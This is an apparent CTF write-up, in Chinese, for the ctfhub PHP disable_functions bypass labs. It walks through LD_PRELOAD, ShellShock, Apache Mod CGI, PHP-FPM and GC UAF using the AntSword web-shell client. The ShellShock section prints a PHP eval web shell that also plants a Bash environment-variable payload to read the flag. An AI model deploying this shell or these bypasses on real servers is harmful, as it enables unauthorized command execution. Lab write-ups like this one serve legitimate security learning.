ctfhub Bypass disable_function

fasewer2024-08-07 18:42

LD_PRELOAD

url

蚁剑连接

选择插件

点击开始

查看到此文件名编辑连接拼接到url后面重新连接

点击开启终端

在终端执行命令

复制代码 
ls /
/readfile

ShellShock

url

CTFHub 环境实例 | 提示信息

蚁剑连接

写入shell.php

复制代码 
<?php
  @eval($_REQUEST['ant']);
  putenv("PHP_test=() { :; }; tac /flag >> /var/www/html/test.php");
  error_log("admin",1);
  //mail("admin@localhost","","","","");
?>

使用插件

终端执行命令得到flag

Apache Mod CGI

查看GetFlag

蚁剑连接

直接使用工具

终端执行命令

PHP-FPM

蚁剑连接

工具连接

拼接地址

在终端执行命令

GC UAF

蚁剑连接

使用工具

在终端执行命令

相关推荐
小馬佩德罗1 小时前
Android 系统的兼容性测试 - CTS
android·cts
缘来的精彩2 小时前
Android ARouter的详细使用指南
android·java·arouter
风起云涌~2 小时前
【Android】ListView控件在进入|退出小窗下的异常
android
syy敬礼2 小时前
Android菜单栏
android
大风起兮云飞扬丶2 小时前
Android——RecyclerView
android
dongpingwang2 小时前
android10 卸载应用出现回退栈异常问题
android
_一条咸鱼_2 小时前
深度剖析:Android SurfaceView 使用原理大揭秘
android·面试·android jetpack
_一条咸鱼_10 小时前
深度揭秘!Android HorizontalScrollView 使用原理全解析
android·面试·android jetpack
_一条咸鱼_10 小时前
揭秘 Android RippleDrawable:深入解析使用原理
android·面试·android jetpack
_一条咸鱼_10 小时前
深入剖析:Android Snackbar 使用原理的源码级探秘
android·面试·android jetpack
热门推荐
01西电B测-计算机网络综合实验(含验收问题)02KGG转MP3工具|非KGM文件|解密音频03从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑04YOLOv5改进 | 添加CA注意力机制 + 增加预测层 + 更换损失函数之GIoU05yolov8,yolo11,yolo12 服务器训练到部署全流程 笔记06我决定放弃搞 Java 了07yolov8实战第五天——yolov8+ffmpg实时视频流检测并进行实时推流——(推流,保姆教学)08YOLOv8入门 | 重要性能衡量指标、训练结果评价及分析及影响mAP的因素【发论文关注的指标】09DeepSeek各版本说明与优缺点分析10Coze扣子平台完整体验和实践(附国内和国际版对比)